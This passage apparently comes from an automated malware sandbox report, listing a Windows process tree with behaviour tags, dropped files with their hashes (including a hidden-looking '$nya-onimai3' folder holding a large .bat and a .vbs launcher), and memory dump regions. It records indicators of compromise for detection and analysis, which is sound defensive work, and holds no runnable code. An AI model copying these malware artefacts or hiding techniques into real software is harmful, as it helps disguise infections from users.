                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4728
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  1⤵
                                                                                                                    PID:3352
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                    1⤵
                                                                                                                      PID:4624
                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:1148
                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      1⤵
                                                                                                                        PID:3128
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:4932
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:1872
                                                                                                                        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:676
                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                          1⤵
                                                                                                                            PID:5280
                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                            1⤵
                                                                                                                              PID:5616
                                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                              1⤵
                                                                                                                                PID:6120
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4416

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                  Filesize

                                                                                                                                  328B

                                                                                                                                  MD5

                                                                                                                                  e8ae9f40bd61dc58b708b0eafc931da8

                                                                                                                                  SHA1

                                                                                                                                  9f789f6c1550ae73436803fde4f387f164d9020e

                                                                                                                                  SHA256

                                                                                                                                  c5be87be3c2a918b962a2c5649bd13efc2144e9f861176a470adac56907ed972

                                                                                                                                  SHA512

                                                                                                                                  9af6f81035093b8bb93bf5e2ec1563805b07fdf2f9d76374992bbd3b72e63a81f0800701df33aa6b489f8ebd9f7d90733ef73ad49f0038d5841b2c97d0a5cb07

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                  Filesize

                                                                                                                                  3KB

                                                                                                                                  MD5

                                                                                                                                  50c591ec2a1e49297738ea9f28e3ad23

                                                                                                                                  SHA1

                                                                                                                                  137e36b4c7c40900138a6bcf8cf5a3cce4d142af

                                                                                                                                  SHA256

                                                                                                                                  7648d785bda8cef95176c70711418cf3f18e065f7710f2ef467884b4887d8447

                                                                                                                                  SHA512

                                                                                                                                  33b5fa32501855c2617a822a4e1a2c9b71f2cf27e1b896cf6e5a28473cfd5e6d126840ca1aa1f59ef32b0d0a82a2a95c94a9cc8b845367b61e65ec70d456deec

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  9c1cbabb1c7b01a73a57ba9dff3a2b88

                                                                                                                                  SHA1

                                                                                                                                  db08a68d1be20ef794469e3eea20d84d60f94cc4

                                                                                                                                  SHA256

                                                                                                                                  52a7cdf7f20ba305d5c0943dd8820d9785157c10da3542798678fd19232b6ea7

                                                                                                                                  SHA512

                                                                                                                                  4b044f9095c7dcfc932931b903e0be703374f60e14eeb994937c476e53a4537b79a4dc949de49f6f104c233d6feca0fd0a92b0ec421e990383629c4cf3b976f4

                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                  Filesize

                                                                                                                                  328B

                                                                                                                                  MD5

                                                                                                                                  fca7af87574119e59b9f98b00753e488

                                                                                                                                  SHA1

                                                                                                                                  0bc6c719354e24a72a383e08a876a26daac642cc

                                                                                                                                  SHA256

                                                                                                                                  040da90f51781b5fcb61660b0adb5c6b417563c19ecb8b5d0fc2682df6ccffa8

                                                                                                                                  SHA512

                                                                                                                                  7f35d4fd2b4a0649c374fb1d546b9b412c924bb12375034b15acd62d36792aee2633f3a769569231871d5aa34eb581508a7fee00d229c1ecf38d78f96d54d06e

                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                  Filesize

                                                                                                                                  290B

                                                                                                                                  MD5

                                                                                                                                  823eb65e01ae06ec59319ebdb9df0654

                                                                                                                                  SHA1

                                                                                                                                  9449d3fd06806aeed01691a6b9e2c2fc3faa4432

                                                                                                                                  SHA256

                                                                                                                                  0091390e6af6a963962c8decb6b3aa16bf9de09677ecf876bd172cd9d20c5a6f

                                                                                                                                  SHA512

                                                                                                                                  3ea25a0eff81568c88ec5be1c5d14ad42208b61f6d031cde62915b53b51405fa10f7713c7f96445ec6d461884b836f540c873e314e010a0eafe826c90b258d87

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hznz3ffg.smc.ps1

                                                                                                                                  Filesize

                                                                                                                                  60B

                                                                                                                                  MD5

                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                  SHA1

                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                  SHA256

                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                  SHA512

                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                • C:\Windows\$nya-onimai3\$nya-Loli.bat

                                                                                                                                  Filesize

                                                                                                                                  3.4MB

                                                                                                                                  MD5

                                                                                                                                  e0b49da0d96e8c5214e9276be383177c

                                                                                                                                  SHA1

                                                                                                                                  acc2c37d489134c2186e95efaf7d3ea768a226f5

                                                                                                                                  SHA256

                                                                                                                                  081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39

                                                                                                                                  SHA512

                                                                                                                                  b34944610642622ed45b1b09b4281e6d4b2f160c3b988aec2c254e2860cc1e5e40d6430057ea61fa323c8d99a32caeab50404c1d10baeb9a3b4bd12e6c068cee

                                                                                                                                • C:\Windows\$nya-onimai3\$nya-Loli.vbs

                                                                                                                                  Filesize

                                                                                                                                  78B

                                                                                                                                  MD5

                                                                                                                                  c578d9653b22800c3eb6b6a51219bbb8

                                                                                                                                  SHA1

                                                                                                                                  a97aa251901bbe179a48dbc7a0c1872e163b1f2d

                                                                                                                                  SHA256

                                                                                                                                  20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

                                                                                                                                  SHA512

                                                                                                                                  3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d

                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  f313c5b4f95605026428425586317353

                                                                                                                                  SHA1

                                                                                                                                  06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                  SHA256

                                                                                                                                  129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                  SHA512

                                                                                                                                  b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                  SHA1

                                                                                                                                  a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                  SHA256

                                                                                                                                  98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                  SHA512

                                                                                                                                  1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                  SHA1

                                                                                                                                  63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                  SHA256

                                                                                                                                  727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                  SHA512

                                                                                                                                  f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                  SHA1

                                                                                                                                  5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                  SHA256

                                                                                                                                  55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                  SHA512

                                                                                                                                  5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                  SHA1

                                                                                                                                  9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                  SHA256

                                                                                                                                  a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                  SHA512

                                                                                                                                  c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                • memory/316-132-0x000001F380070000-0x000001F38009A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-96-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-99-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-88-0x000001EA800F0000-0x000001EA80114000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  144KB

                                                                                                                                • memory/616-89-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-91-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-95-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-97-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-98-0x000001EA80120000-0x000001EA8014A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/616-100-0x00007FF833C50000-0x00007FF833C60000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/680-58-0x0000000001040000-0x0000000001069000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  164KB

                                                                                                                                • memory/684-114-0x00007FF833C50000-0x00007FF833C60000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/684-112-0x000002C2E1700000-0x000002C2E172A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/684-110-0x000002C2E1700000-0x000002C2E172A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/684-104-0x000002C2E1700000-0x000002C2E172A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/684-113-0x000002C2E1700000-0x000002C2E172A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/684-109-0x000002C2E1700000-0x000002C2E172A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/684-111-0x000002C2E1700000-0x000002C2E172A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/752-73-0x00007FF873BD0000-0x00007FF873DC5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/752-74-0x00007FF872090000-0x00007FF87214E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/752-72-0x0000019A4B6E0000-0x0000019A4B70A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-118-0x000001AD721D0000-0x000001AD721FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-123-0x000001AD721D0000-0x000001AD721FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-124-0x000001AD721D0000-0x000001AD721FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-125-0x000001AD721D0000-0x000001AD721FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-126-0x000001AD721D0000-0x000001AD721FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-127-0x000001AD721D0000-0x000001AD721FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/952-128-0x00007FF833C50000-0x00007FF833C60000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/1968-84-0x00007FF872090000-0x00007FF87214E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/1968-75-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/1968-76-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/1968-85-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/1968-77-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/1968-80-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/1968-81-0x00007FF873BD0000-0x00007FF873DC5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/1968-78-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2484-60-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/2484-62-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/3040-17-0x00000287B5D90000-0x00000287B5D91000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/3040-15-0x00000287B5D60000-0x00000287B5D6A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                • memory/3040-6-0x000002879B940000-0x000002879B962000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                • memory/3040-11-0x00007FF855670000-0x00007FF856131000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/3040-12-0x00007FF855670000-0x00007FF856131000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/3040-13-0x00000287B6000000-0x00000287B6044000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  272KB

                                                                                                                                • memory/3040-14-0x00000287B6050000-0x00000287B60C6000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  472KB

                                                                                                                                • memory/3040-0-0x00007FF855673000-0x00007FF855675000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/3040-47-0x00007FF855670000-0x00007FF856131000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/3040-19-0x00007FF855670000-0x00007FF856131000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/3040-18-0x00007FF855673000-0x00007FF855675000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/3040-16-0x00000287B60D0000-0x00000287B62D8000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/3444-49-0x000001C43F2B0000-0x000001C43F7A0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4.9MB

                                                                                                                                • memory/3444-59-0x000001C4410A0000-0x000001C4415C8000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  5.2MB

                                                                                                                                • memory/3444-51-0x000001C43FF00000-0x000001C43FF50000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  320KB

                                                                                                                                • memory/3444-52-0x000001C440010000-0x000001C4400C2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  712KB

                                                                                                                                • memory/3444-53-0x000001C4402A0000-0x000001C440462000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  1.8MB

                                                                                                                                • memory/3444-56-0x000001C43FF50000-0x000001C43FF62000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  72KB

                                                                                                                                • memory/3444-57-0x000001C43FFB0000-0x000001C43FFEC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  240KB